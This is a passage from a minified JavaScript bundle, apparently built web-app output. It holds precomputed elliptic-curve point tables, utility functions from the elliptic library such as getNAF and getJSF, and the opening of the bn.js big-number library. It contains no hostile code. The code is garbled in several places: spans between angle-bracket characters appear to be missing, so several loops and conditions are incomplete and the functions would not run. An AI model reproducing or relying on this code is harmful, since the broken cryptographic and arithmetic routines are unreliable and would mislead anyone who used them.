eece97c1c9b6041798b85dfdfb6d8882da20308f5404824526087e","493d13fef524ba188af4c4dc54d07936c7b7ed6fb90e2ceb2c951e01f0c29907"],["827fbbe4b1e880ea9ed2b2e6301b212b57f1ee148cd6dd28780e5e2cf856e241","c60f9c923c727b0b71bef2c67d1d12687ff7a63186903166d605b68baec293ec"],["eaa649f21f51bdbae7be4ae34ce6e5217a58fdce7f47f9aa7f3b58fa2120e2b3","be3279ed5bbbb03ac69a80f89879aa5a01a6b965f13f7e59d47a5305ba5ad93d"],["e4a42d43c5cf169d9391df6decf42ee541b6d8f0c9a137401e23632dda34d24f","4d9f92e716d1c73526fc99ccfb8ad34ce886eedfa8d8e4f13a7f7131deba9414"],["1ec80fef360cbdd954160fadab352b6b92b53576a88fea4947173b9d4300bf19","aeefe93756b5340d2f3a4958a7abbf5e0146e77f6295a07b671cdc1cc107cefd"],["146a778c04670c2f91b00af4680dfa8bce3490717d58ba889ddb5928366642be","b318e0ec3354028add669827f9d4b2870aaa971d2f7e5ed1d0b297483d83efd0"],["fa50c0f61d22e5f07e3acebb1aa07b128d0012209a28b9776d76a8793180eef9","6b84c6922397eba9b72cd2872281a68a5e683293a57a213b38cd8d7d3f4f2811"],["da1d61d0ca721a11b1a5bf6b7d88e8421a288ab5d5bba5220e53d32b5f067ec2","8157f55a7c99306c79c0766161c91e2966a73899d279b48a655fba0f1ad836f1"],["a8e282ff0c9706907215ff98e8fd416615311de0446f1e062a73b0610d064e13","7f97355b8db81c09abfb7f3c5b2515888b679a3e50dd6bd6cef7c73111f4cc0c"],["174a53b9c9a285872d39e56e6913cab15d59b1fa512508c022f382de8319497c","ccc9dc37abfc9c1657b4155f2c47f9e6646b3a1d8cb9854383da13ac079afa73"],["959396981943785c3d3e57edf5018cdbe039e730e4918b3d884fdff09475b7ba","2e7e552888c331dd8ba0386a4b9cd6849c653f64c8709385e9b8abf87524f2fd"],["d2a63a50ae401e56d645a1153b109a8fcca0a43d561fba2dbb51340c9d82b151","e82d86fb6443fcb7565aee58b2948220a70f750af484ca52d4142174dcf89405"],["64587e2335471eb890ee7896d7cfdc866bacbdbd3839317b3436f9b45617e073","d99fcdd5bf6902e2ae96dd6447c299a185b90a39133aeab358299e5e9faf6589"],["8481bde0e4e4d885b3a546d3e549de042f0aa6cea250e7fd358d6c86dd45e458","38ee7b8cba5404dd84a25bf39cecb2ca900a79c42b262e556d64b1b59779057e"],["13464a57a78102aa62b6979ae817f4637ffcfed3c4b1ce30bcd6303f6caf666b","69be159004614580ef7e433453ccb0ca48f300a81d0942e13f495a907f6ecc27"],["bc4a9df5b713fe2e9aef430bcc1dc97a0cd9ccede2f28588cada3a0d2d83f366","d3a81ca6e785c06383937adf4b798caa6e8a9fbfa547b16d758d666581f33c1"],["8c28a97bf8298bc0d23d8c749452a32e694b65e30a9472a3954ab30fe5324caa","40a30463a3305193378fedf31f7cc0eb7ae784f0451cb9459e71dc73cbef9482"],["8ea9666139527a8c1dd94ce4f071fd23c8b350c5a4bb33748c4ba111faccae0","620efabbc8ee2782e24e7c0cfb95c5d735b783be9cf0f8e955af34a30e62b945"],["dd3625faef5ba06074669716bbd3788d89bdde815959968092f76cc4eb9a9787","7a188fa3520e30d461da2501045731ca941461982883395937f68d00c644a573"],["f710d79d9eb962297e4f6232b40e8f7feb2bc63814614d692c12de752408221e","ea98e67232d3b3295d3b535532115ccac8612c721851617526ae47a9c77bfc82"]]},naf:{wnd:7,points:[["f9308a019258c31049344f85f89d5229b531c845836f99b08601f113bce036f9","388f7b0f632de8140fe337e62a37f3566500a99934c2231b6cb9fd7584b8e672"],["2f8bde4d1a07209355b4a7250a5c5128e88b84bddc619ab7cba8d569b240efe4","d8ac222636e5e3d6d4dba9dda6c9c426f788271bab0d6840dca87d3aa6ac62d6"],["5cbdf0646e5db4eaa398f365f2ea7a0e3d419b7e0330e39ce92bddedcac4f9bc","6aebca40ba255960a3178d6d861a54dba813d0b813fde7b5a5082628087264da"],["acd484e2f0c7f65309ad178a9f559abde09796974c57e714c35f110dfc27ccbe","cc338921b0a7d9fd64380971763b61e9add888a4375f8e0f05cc262ac64f9c37"],["774ae7f858a9411e5ef4246b70c65aac5649980be5c17891bbec17895da008cb","d984a032eb6b5e190243dd56d7b7b365372db1e2dff9d6a8301d74c9c953c61b"],["f28773c2d975288bc7d1d205c3748651b075fbc6610e58cddeeddf8f19405aa8","ab0902e8d880a89758212eb65cdaf473a1a06da521fa91f29b5cb52db03ed81"],["d7924d4f7d43ea965a465ae3095ff41131e5946f3c85f79e44adbcf8e27e080e","581e2872a86c72a683842ec228cc6defea40af2bd896d3a5c504dc9ff6a26b58"],["defdea4cdb677750a420fee807eacf21eb9898ae79b9768766e4faa04a2d4a34","4211ab0694635168e997b0ead2a93daeced1f4a04a95c0f6cfb199f69e56eb77"],["2b4ea0a797a443d293ef5cff444f4979f06acfebd7e86d277475656138385b6c","85e89bc037945d93b343083b5a1c86131a01f60c50269763b570c854e5c09b7a"],["352bbf4a4cdd12564f93fa332ce333301d9ad40271f8107181340aef25be59d5","321eb4075348f534d59c18259dda3e1f4a1b3b2e71b1039c67bd3d8bcf81998c"],["2fa2104d6b38d11b0230010559879124e42ab8dfeff5ff29dc9cdadd4ecacc3f","2de1068295dd865b64569335bd5dd80181d70ecfc882648423ba76b532b7d67"],["9248279b09b4d68dab21a9b066edda83263c3d84e09572e269ca0cd7f5453714","73016f7bf234aade5d1aa71bdea2b1ff3fc0de2a887912ffe54a32ce97cb3402"],["daed4f2be3a8bf278e70132fb0beb7522f570e144bf615c07e996d443dee8729","a69dce4a7d6c98e8d4a1aca87ef8d7003f83c230f3afa726ab40e52290be1c55"],["c44d12c7065d812e8acf28d7cbb19f9011ecd9e9fdf281b0e6a3b5e87d22e7db","2119a460ce326cdc76c45926c982fdac0e106e861edf61c5a039063f0e0e6482"],["6a245bf6dc698504c89a20cfded60853152b695336c28063b61c65cbd269e6b4","e022cf42c2bd4a708b3f5126f16a24ad8b33ba48d0423b6efd5e6348100d8a82"],["1697ffa6fd9de627c077e3d2fe541084ce13300b0bec1146f95ae57f0d0bd6a5","b9c398f186806f5d27561506e4557433a2cf15009e498ae7adee9d63d01b2396"],["605bdb019981718b986d0f07e834cb0d9deb8360ffb7f61df982345ef27a7479","2972d2de4f8d20681a78d93ec96fe23c26bfae84fb14db43b01e1e9056b8c49"],["62d14dab4150bf497402fdc45a215e10dcb01c354959b10cfe31c7e9d87ff33d","80fc06bd8cc5b01098088a1950eed0db01aa132967ab472235f5642483b25eaf"],["80c60ad0040f27dade5b4b06c408e56b2c50e9f56b9b8b425e555c2f86308b6f","1c38303f1cc5c30f26e66bad7fe72f70a65eed4cbe7024eb1aa01f56430bd57a"],["7a9375ad6167ad54aa74c6348cc54d344cc5dc9487d847049d5eabb0fa03c8fb","d0e3fa9eca8726909559e0d79269046bdc59ea10c70ce2b02d499ec224dc7f7"],["d528ecd9b696b54c907a9ed045447a79bb408ec39b68df504bb51f459bc3ffc9","eecf41253136e5f99966f21881fd656ebc4345405c520dbc063465b521409933"],["49370a4b5f43412ea25f514e8ecdad05266115e4a7ecb1387231808f8b45963","758f3f41afd6ed428b3081b0512fd62a54c3f3afbb5b6764b653052a12949c9a"],["77f230936ee88cbbd73df930d64702ef881d811e0e1498e2f1c13eb1fc345d74","958ef42a7886b6400a08266e9ba1b37896c95330d97077cbbe8eb3c7671c60d6"],["f2dac991cc4ce4b9ea44887e5c7c0bce58c80074ab9d4dbaeb28531b7739f530","e0dedc9b3b2f8dad4da1f32dec2531df9eb5fbeb0598e4fd1a117dba703a3c37"],["463b3d9f662621fb1b4be8fbbe2520125a216cdfc9dae3debcba4850c690d45b","5ed430d78c296c3543114306dd8622d7c622e27c970a1de31cb377b01af7307e"],["f16f804244e46e2a09232d4aff3b59976b98fac14328a2d1a32496b49998f247","cedabd9b82203f7e13d206fcdf4e33d92a6c53c26e5cce26d6579962c4e31df6"],["caf754272dc84563b0352b7a14311af55d245315ace27c65369e15f7151d41d1","cb474660ef35f5f2a41b643fa5e460575f4fa9b7962232a5c32f908318a04476"],["2600ca4b282cb986f85d0f1709979d8b44a09c07cb86d7c124497bc86f082120","4119b88753c15bd6a693b03fcddbb45d5ac6be74ab5f0ef44b0be9475a7e4b40"],["7635ca72d7e8432c338ec53cd12220bc01c48685e24f7dc8c602a7746998e435","91b649609489d613d1d5e590f78e6d74ecfc061d57048bad9e76f302c5b9c61"],["754e3239f325570cdbbf4a87deee8a66b7f2b33479d468fbc1a50743bf56cc18","673fb86e5bda30fb3cd0ed304ea49a023ee33d0197a695d0c5d98093c536683"],["e3e6bd1071a1e96aff57859c82d570f0330800661d1c952f9fe2694691d9b9e8","59c9e0bba394e76f40c0aa58379a3cb6a5a2283993e90c4167002af4920e37f5"],["186b483d056a033826ae73d88f732985c4ccb1f32ba35f4b4cc47fdcf04aa6eb","3b952d32c67cf77e2e17446e204180ab21fb8090895138b4a4a797f86e80888b"],["df9d70a6b9876ce544c98561f4be4f725442e6d2b737d9c91a8321724ce0963f","55eb2dafd84d6ccd5f862b785dc39d4ab157222720ef9da217b8c45cf2ba2417"],["5edd5cc23c51e87a497ca815d5dce0f8ab52554f849ed8995de64c5f34ce7143","efae9c8dbc14130661e8cec030c89ad0c13c66c0d17a2905cdc706ab7399a868"],["290798c2b6476830da12fe02287e9e777aa3fba1c355b17a722d362f84614fba","e38da76dcd440621988d00bcf79af25d5b29c094db2a23146d003afd41943e7a"],["af3c423a95d9f5b3054754efa150ac39cd29552fe360257362dfdecef4053b45","f98a3fd831eb2b749a93b0e6f35cfb40c8cd5aa667a15581bc2feded498fd9c6"],["766dbb24d134e745cccaa28c99bf274906bb66b26dcf98df8d2fed50d884249a","744b1152eacbe5e38dcc887980da38b897584a65fa06cedd2c924f97cbac5996"],["59dbf46f8c94759ba21277c33784f41645f7b44f6c596a58ce92e666191abe3e","c534ad44175fbc300f4ea6ce648309a042ce739a7919798cd85e216c4a307f6e"],["f13ada95103c4537305e691e74e9a4a8dd647e711a95e73cb62dc6018cfd87b8","e13817b44ee14de663bf4bc808341f326949e21a6a75c2570778419bdaf5733d"],["7754b4fa0e8aced06d4167a2c59cca4cda1869c06ebadfb6488550015a88522c","30e93e864e669d82224b967c3020b8fa8d1e4e350b6cbcc537a48b57841163a2"],["948dcadf5990e048aa3874d46abef9d701858f95de8041d2a6828c99e2262519","e491a42537f6e597d5d28a3224b1bc25df9154efbd2ef1d2cbba2cae5347d57e"],["7962414450c76c1689c7b48f8202ec37fb224cf5ac0bfa1570328a8a3d7c77ab","100b610ec4ffb4760d5c1fc133ef6f6b12507a051f04ac5760afa5b29db83437"],["3514087834964b54b15b160644d915485a16977225b8847bb0dd085137ec47ca","ef0afbb2056205448e1652c48e8127fc6039e77c15c2378b7e7d15a0de293311"],["d3cc30ad6b483e4bc79ce2c9dd8bc54993e947eb8df787b442943d3f7b527eaf","8b378a22d827278d89c5e9be8f9508ae3c2ad46290358630afb34db04eede0a4"],["1624d84780732860ce1c78fcbfefe08b2b29823db913f6493975ba0ff4847610","68651cf9b6da903e0914448c6cd9d4ca896878f5282be4c8cc06e2a404078575"],["733ce80da955a8a26902c95633e62a985192474b5af207da6df7b4fd5fc61cd4","f5435a2bd2badf7d485a4d8b8db9fcce3e1ef8e0201e4578c54673bc1dc5ea1d"],["15d9441254945064cf1a1c33bbd3b49f8966c5092171e699ef258dfab81c045c","d56eb30b69463e7234f5137b73b84177434800bacebfc685fc37bbe9efe4070d"],["a1d0fcf2ec9de675b612136e5ce70d271c21417c9d2b8aaaac138599d0717940","edd77f50bcb5a3cab2e90737309667f2641462a54070f3d519212d39c197a629"],["e22fbe15c0af8ccc5780c0735f84dbe9a790badee8245c06c7ca37331cb36980","a855babad5cd60c88b430a69f53a1a7a38289154964799be43d06d77d31da06"],["311091dd9860e8e20ee13473c1155f5f69635e394704eaa74009452246cfa9b3","66db656f87d1f04fffd1f04788c06830871ec5a64feee685bd80f0b1286d8374"],["34c1fd04d301be89b31c0442d3e6ac24883928b45a9340781867d4232ec2dbdf","9414685e97b1b5954bd46f730174136d57f1ceeb487443dc5321857ba73abee"],["f219ea5d6b54701c1c14de5b557eb42a8d13f3abbcd08affcc2a5e6b049b8d63","4cb95957e83d40b0f73af4544cccf6b1f4b08d3c07b27fb8d8c2962a400766d1"],["d7b8740f74a8fbaab1f683db8f45de26543a5490bca627087236912469a0b448","fa77968128d9c92ee1010f337ad4717eff15db5ed3c049b3411e0315eaa4593b"],["32d31c222f8f6f0ef86f7c98d3a3335ead5bcd32abdd94289fe4d3091aa824bf","5f3032f5892156e39ccd3d7915b9e1da2e6dac9e6f26e961118d14b8462e1661"],["7461f371914ab32671045a155d9831ea8793d77cd59592c4340f86cbc18347b5","8ec0ba238b96bec0cbdddcae0aa442542eee1ff50c986ea6b39847b3cc092ff6"],["ee079adb1df1860074356a25aa38206a6d716b2c3e67453d287698bad7b2b2d6","8dc2412aafe3be5c4c5f37e0ecc5f9f6a446989af04c4e25ebaac479ec1c8c1e"],["16ec93e447ec83f0467b18302ee620f7e65de331874c9dc72bfd8616ba9da6b5","5e4631150e62fb40d0e8c2a7ca5804a39d58186a50e497139626778e25b0674d"],["eaa5f980c245f6f038978290afa70b6bd8855897f98b6aa485b96065d537bd99","f65f5d3e292c2e0819a528391c994624d784869d7e6ea67fb18041024edc07dc"],["78c9407544ac132692ee1910a02439958ae04877151342ea96c4b6b35a49f51","f3e0319169eb9b85d5404795539a5e68fa1fbd583c064d2462b675f194a3ddb4"],["494f4be219a1a77016dcd838431aea0001cdc8ae7a6fc688726578d9702857a5","42242a969283a5f339ba7f075e36ba2af925ce30d767ed6e55f4b031880d562c"],["a598a8030da6d86c6bc7f2f5144ea549d28211ea58faa70ebf4c1e665c1fe9b5","204b5d6f84822c307e4b4a7140737aec23fc63b65b35f86a10026dbd2d864e6b"],["c41916365abb2b5d09192f5f2dbeafec208f020f12570a184dbadc3e58595997","4f14351d0087efa49d245b328984989d5caf9450f34bfc0ed16e96b58fa9913"],["841d6063a586fa475a724604da03bc5b92a2e0d2e0a36acfe4c73a5514742881","73867f59c0659e81904f9a1c7543698e62562d6744c169ce7a36de01a8d6154"],["5e95bb399a6971d376026947f89bde2f282b33810928be4ded112ac4d70e20d5","39f23f366809085beebfc71181313775a99c9aed7d8ba38b161384c746012865"],["36e4641a53948fd476c39f8a99fd974e5ec07564b5315d8bf99471bca0ef2f66","d2424b1b1abe4eb8164227b085c9aa9456ea13493fd563e06fd51cf5694c78fc"],["336581ea7bfbbb290c191a2f507a41cf5643842170e914faeab27c2c579f726","ead12168595fe1be99252129b6e56b3391f7ab1410cd1e0ef3dcdcabd2fda224"],["8ab89816dadfd6b6a1f2634fcf00ec8403781025ed6890c4849742706bd43ede","6fdcef09f2f6d0a044e654aef624136f503d459c3e89845858a47a9129cdd24e"],["1e33f1a746c9c5778133344d9299fcaa20b0938e8acff2544bb40284b8c5fb94","60660257dd11b3aa9c8ed618d24edff2306d320f1d03010e33a7d2057f3b3b6"],["85b7c1dcb3cec1b7ee7f30ded79dd20a0ed1f4cc18cbcfcfa410361fd8f08f31","3d98a9cdd026dd43f39048f25a8847f4fcafad1895d7a633c6fed3c35e999511"],["29df9fbd8d9e46509275f4b125d6d45d7fbe9a3b878a7af872a2800661ac5f51","b4c4fe99c775a606e2d8862179139ffda61dc861c019e55cd2876eb2a27d84b"],["a0b1cae06b0a847a3fea6e671aaf8adfdfe58ca2f768105c8082b2e449fce252","ae434102edde0958ec4b19d917a6a28e6b72da1834aff0e650f049503a296cf2"],["4e8ceafb9b3e9a136dc7ff67e840295b499dfb3b2133e4ba113f2e4c0e121e5","cf2174118c8b6d7a4b48f6d534ce5c79422c086a63460502b827ce62a326683c"],["d24a44e047e19b6f5afb81c7ca2f69080a5076689a010919f42725c2b789a33b","6fb8d5591b466f8fc63db50f1c0f1c69013f996887b8244d2cdec417afea8fa3"],["ea01606a7a6c9cdd249fdfcfacb99584001edd28abbab77b5104e98e8e3b35d4","322af4908c7312b0cfbfe369f7a7b3cdb7d4494bc2823700cfd652188a3ea98d"],["af8addbf2b661c8a6c6328655eb96651252007d8c5ea31be4ad196de8ce2131f","6749e67c029b85f52a034eafd096836b2520818680e26ac8f3dfbcdb71749700"],["e3ae1974566ca06cc516d47e0fb165a674a3dabcfca15e722f0e3450f45889","2aeabe7e4531510116217f07bf4d07300de97e4874f81f533420a72eeb0bd6a4"],["591ee355313d99721cf6993ffed1e3e301993ff3ed258802075ea8ced397e246","b0ea558a113c30bea60fc4775460c7901ff0b053d25ca2bdeee98f1a4be5d196"],["11396d55fda54c49f19aa97318d8da61fa8584e47b084945077cf03255b52984","998c74a8cd45ac01289d5833a7beb4744ff536b01b257be4c5767bea93ea57a4"],["3c5d2a1ba39c5a1790000738c9e0c40b8dcdfd5468754b6405540157e017aa7a","b2284279995a34e2f9d4de7396fc18b80f9b8b9fdd270f6661f79ca4c81bd257"],["cc8704b8a60a0defa3a99a7299f2e9c3fbc395afb04ac078425ef8a1793cc030","bdd46039feed17881d1e0862db347f8cf395b74fc4bcdc4e940b74e3ac1f1b13"],["c533e4f7ea8555aacd9777ac5cad29b97dd4defccc53ee7ea204119b2889b197","6f0a256bc5efdf429a2fb6242f1a43a2d9b925bb4a4b3a26bb8e0f45eb596096"],["c14f8f2ccb27d6f109f6d08d03cc96a69ba8c34eec07bbcf566d48e33da6593","c359d6923bb398f7fd4473e16fe1c28475b740dd098075e6c0e8649113dc3a38"],["a6cbc3046bc6a450bac24789fa17115a4c9739ed75f8f21ce441f72e0b90e6ef","21ae7f4680e889bb130619e2c0f95a360ceb573c70603139862afd617fa9b9f"],["347d6d9a02c48927ebfb86c1359b1caf130a3c0267d11ce6344b39f99d43cc38","60ea7f61a353524d1c987f6ecec92f086d565ab687870cb12689ff1e31c74448"],["da6545d2181db8d983f7dcb375ef5866d47c67b1bf31c8cf855ef7437b72656a","49b96715ab6878a79e78f07ce5680c5d6673051b4935bd897fea824b77dc208a"],["c40747cc9d012cb1a13b8148309c6de7ec25d6945d657146b9d5994b8feb1111","5ca560753be2a12fc6de6caf2cb489565db936156b9514e1bb5e83037e0fa2d4"],["4e42c8ec82c99798ccf3a610be870e78338c7f713348bd34c8203ef4037f3502","7571d74ee5e0fb92a7a8b33a07783341a5492144cc54bcc40a94473693606437"],["3775ab7089bc6af823aba2e1af70b236d251cadb0c86743287522a1b3b0dedea","be52d107bcfa09d8bcb9736a828cfa7fac8db17bf7a76a2c42ad961409018cf7"],["cee31cbf7e34ec379d94fb814d3d775ad954595d1314ba8846959e3e82f74e26","8fd64a14c06b589c26b947ae2bcf6bfa0149ef0be14ed4d80f448a01c43b1c6d"],["b4f9eaea09b6917619f6ea6a4eb5464efddb58fd45b1ebefcdc1a01d08b47986","39e5c9925b5a54b07433a4f18c61726f8bb131c012ca542eb24a8ac07200682a"],["d4263dfc3d2df923a0179a48966d30ce84e2515afc3dccc1b77907792ebcc60e","62dfaf07a0f78feb30e30d6295853ce189e127760ad6cf7fae164e122a208d54"],["48457524820fa65a4f8d35eb6930857c0032acc0a4a2de422233eeda897612c4","25a748ab367979d98733c38a1fa1c2e7dc6cc07db2d60a9ae7a76aaa49bd0f77"],["dfeeef1881101f2cb11644f3a2afdfc2045e19919152923f367a1767c11cceda","ecfb7056cf1de042f9420bab396793c0c390bde74b4bbdff16a83ae09a9a7517"],["6d7ef6b17543f8373c573f44e1f389835d89bcbc6062ced36c82df83b8fae859","cd450ec335438986dfefa10c57fea9bcc521a0959b2d80bbf74b190dca712d10"],["e75605d59102a5a2684500d3b991f2e3f3c88b93225547035af25af66e04541f","f5c54754a8f71ee540b9b48728473e314f729ac5308b06938360990e2bfad125"],["eb98660f4c4dfaa06a2be453d5020bc99a0c2e60abe388457dd43fefb1ed620c","6cb9a8876d9cb8520609af3add26cd20a0a7cd8a9411131ce85f44100099223e"],["13e87b027d8514d35939f2e6892b19922154596941888336dc3563e3b8dba942","fef5a3c68059a6dec5d624114bf1e91aac2b9da568d6abeb2570d55646b8adf1"],["ee163026e9fd6fe017c38f06a5be6fc125424b371ce2708e7bf4491691e5764a","1acb250f255dd61c43d94ccc670d0f58f49ae3fa15b96623e5430da0ad6c62b2"],["b268f5ef9ad51e4d78de3a750c2dc89b1e626d43505867999932e5db33af3d80","5f310d4b3c99b9ebb19f77d41c1dee018cf0d34fd4191614003e945a1216e423"],["ff07f3118a9df035e9fad85eb6c7bfe42b02f01ca99ceea3bf7ffdba93c4750d","438136d603e858a3a5c440c38eccbaddc1d2942114e2eddd4740d098ced1f0d8"],["8d8b9855c7c052a34146fd20ffb658bea4b9f69e0d825ebec16e8c3ce2b526a1","cdb559eedc2d79f926baf44fb84ea4d44bcf50fee51d7ceb30e2e7f463036758"],["52db0b5384dfbf05bfa9d472d7ae26dfe4b851ceca91b1eba54263180da32b63","c3b997d050ee5d423ebaf66a6db9f57b3180c902875679de924b69d84a7b375"],["e62f9490d3d51da6395efd24e80919cc7d0f29c3f3fa48c6fff543becbd43352","6d89ad7ba4876b0b22c2ca280c682862f342c8591f1daf5170e07bfd9ccafa7d"],["7f30ea2476b399b4957509c88f77d0191afa2ff5cb7b14fd6d8e7d65aaab1193","ca5ef7d4b231c94c3b15389a5f6311e9daff7bb67b103e9880ef4bff637acaec"],["5098ff1e1d9f14fb46a210fada6c903fef0fb7b4a1dd1d9ac60a0361800b7a00","9731141d81fc8f8084d37c6e7542006b3ee1b40d60dfe5362a5b132fd17ddc0"],["32b78c7de9ee512a72895be6b9cbefa6e2f3c4ccce445c96b9f2c81e2778ad58","ee1849f513df71e32efc3896ee28260c73bb80547ae2275ba497237794c8753c"],["e2cb74fddc8e9fbcd076eef2a7c72b0ce37d50f08269dfc074b581550547a4f7","d3aa2ed71c9dd2247a62df062736eb0baddea9e36122d2be8641abcb005cc4a4"],["8438447566d4d7bedadc299496ab357426009a35f235cb141be0d99cd10ae3a8","c4e1020916980a4da5d01ac5e6ad330734ef0d7906631c4f2390426b2edd791f"],["4162d488b89402039b584c6fc6c308870587d9c46f660b878ab65c82c711d67e","67163e903236289f776f22c25fb8a3afc1732f2b84b4e95dbda47ae5a0852649"],["3fad3fa84caf0f34f0f89bfd2dcf54fc175d767aec3e50684f3ba4a4bf5f683d","cd1bc7cb6cc407bb2f0ca647c718a730cf71872e7d0d2a53fa20efcdfe61826"],["674f2600a3007a00568c1a7ce05d0816c1fb84bf1370798f1c69532faeb1a86b","299d21f9413f33b3edf43b257004580b70db57da0b182259e09eecc69e0d38a5"],["d32f4da54ade74abb81b815ad1fb3b263d82d6c692714bcff87d29bd5ee9f08f","f9429e738b8e53b968e99016c059707782e14f4535359d582fc416910b3eea87"],["30e4e670435385556e593657135845d36fbb6931f72b08cb1ed954f1e3ce3ff6","462f9bce619898638499350113bbc9b10a878d35da70740dc695a559eb88db7b"],["be2062003c51cc3004682904330e4dee7f3dcd10b01e580bf1971b04d4cad297","62188bc49d61e5428573d48a74e1c655b1c61090905682a0d5558ed72dccb9bc"],["93144423ace3451ed29e0fb9ac2af211cb6e84a601df5993c419859fff5df04a","7c10dfb164c3425f5c71a3f9d7992038f1065224f72bb9d1d902a6d13037b47c"],["b015f8044f5fcbdcf21ca26d6c34fb8197829205c7b7d2a7cb66418c157b112c","ab8c1e086d04e813744a655b2df8d5f83b3cdc6faa3088c1d3aea1454e3a1d5f"],["d5e9e1da649d97d89e4868117a465a3a4f8a18de57a140d36b3f2af341a21b52","4cb04437f391ed73111a13cc1d4dd0db1693465c2240480d8955e8592f27447a"],["d3ae41047dd7ca065dbf8ed77b992439983005cd72e16d6f996a5316d36966bb","bd1aeb21ad22ebb22a10f0303417c6d964f8cdd7df0aca614b10dc14d125ac46"],["463e2763d885f958fc66cdd22800f0a487197d0a82e377b49f80af87c897b065","bfefacdb0e5d0fd7df3a311a94de062b26b80c61fbc97508b79992671ef7ca7f"],["7985fdfd127c0567c6f53ec1bb63ec3158e597c40bfe747c83cddfc910641917","603c12daf3d9862ef2b25fe1de289aed24ed291e0ec6708703a5bd567f32ed03"],["74a1ad6b5f76e39db2dd249410eac7f99e74c59cb83d2d0ed5ff1543da7703e9","cc6157ef18c9c63cd6193d83631bbea0093e0968942e8c33d5737fd790e0db08"],["30682a50703375f602d416664ba19b7fc9bab42c72747463a71d0896b22f6da3","553e04f6b018b4fa6c8f39e7f311d3176290d0e0f19ca73f17714d9977a22ff8"],["9e2158f0d7c0d5f26c3791efefa79597654e7a2b2464f52b1ee6c1347769ef57","712fcdd1b9053f09003a3481fa7762e9ffd7c8ef35a38509e2fbf2629008373"],["176e26989a43c9cfeba4029c202538c28172e566e3c4fce7322857f3be327d66","ed8cc9d04b29eb877d270b4878dc43c19aefd31f4eee09ee7b47834c1fa4b1c3"],["75d46efea3771e6e68abb89a13ad747ecf1892393dfc4f1b7004788c50374da8","9852390a99507679fd0b86fd2b39a868d7efc22151346e1a3ca4726586a6bed8"],["809a20c67d64900ffb698c4c825f6d5f2310fb0451c869345b7319f645605721","9e994980d9917e22b76b061927fa04143d096ccc54963e6a5ebfa5f3f8e286c1"],["1b38903a43f7f114ed4500b4eac7083fdefece1cf29c63528d563446f972c180","4036edc931a60ae889353f77fd53de4a2708b26b6f5da72ad3394119daf408f9"]]}}},7e3:(Pe,we,de)=>{"use strict";var ie=we,j=de(1959),Q=de(490),ae=de(4108);ie.assert=Q,ie.toArray=ae.toArray,ie.zero2=ae.zero2,ie.toHex=ae.toHex,ie.encode=ae.encode,ie.getNAF=function I(b,_,y){var A=new Array(Math.max(b.bitLength(),y)+1);A.fill(0);for(var p=1<<_+1,D=b.clone(),w=0;w(p>>1)-1?(p>>1)-S:S):x=0,A[w]=x,D.iushrn(1)}return A},ie.getJSF=function $(b,_){var y=[[],[]];b=b.clone(),_=_.clone();for(var D,A=0,p=0;b.cmpn(-A)>0||_.cmpn(-p)>0;){var S,O,w=b.andln(3)+A&3,x=_.andln(3)+p&3;3===w&&(w=-1),3===x&&(x=-1),S=0==(1&w)?0:3!=(D=b.andln(7)+A&7)&&5!==D||2!==x?w:-w,y[0].push(S),O=0==(1&x)?0:3!=(D=_.andln(7)+p&7)&&5!==D||2!==w?x:-x,y[1].push(O),2*A===S+1&&(A=1-A),2*p===O+1&&(p=1-p),b.iushrn(1),_.iushrn(1)}return y},ie.cachedProperty=function U(b,_,y){var A="_"+_;b.prototype[_]=function(){return void 0!==this[A]?this[A]:this[A]=y.call(this)}},ie.parseBytes=function E(b){return"string"==typeof b?ie.toArray(b,"hex"):b},ie.intFromLE=function C(b){return new j(b,"hex","le")}},1959:function(Pe,we,de){!function(ie,j){"use strict";function Q(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var $;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{$="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(5568).Buffer}catch(z){}function U(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var v=U(z,f);return f-1>=l&&(v|=U(z,f-1)<<4),v}function C(z,l,f,v){for(var M=0,P=Math.min(z.length,f),G=l;G=49?X-49+10:X>=17?X-17+10:X}return M}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,v){if("number"==typeof l)return this._initNumber(l,f,v);if("object"==typeof l)return this._initArray(l,f,v);"hex"===f&&(f=16),Q(f===(0|f)&&f>=2&&f<=36);var M=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(M++,this.negative=1),M=0;M-=3)this.words[P]|=(G=l[M]|l[M-1]<<8|l[M-2]<<16)<>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===v)for(M=0,P=0;M>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,v){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var M=0;M=f;M-=2)X=E(l,f,M)<=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(M=(l.length-f)%2==0?f+1:f;M=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,v){this.words=[0],this.length=1;for(var M=0,P=1;P<=67108863;P*=f)M++;M--,P=P/f|0;for(var G=l.length-v,X=G%M,L=Math.min(G,G-X)+v,h=0,R=v;R1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?""};var 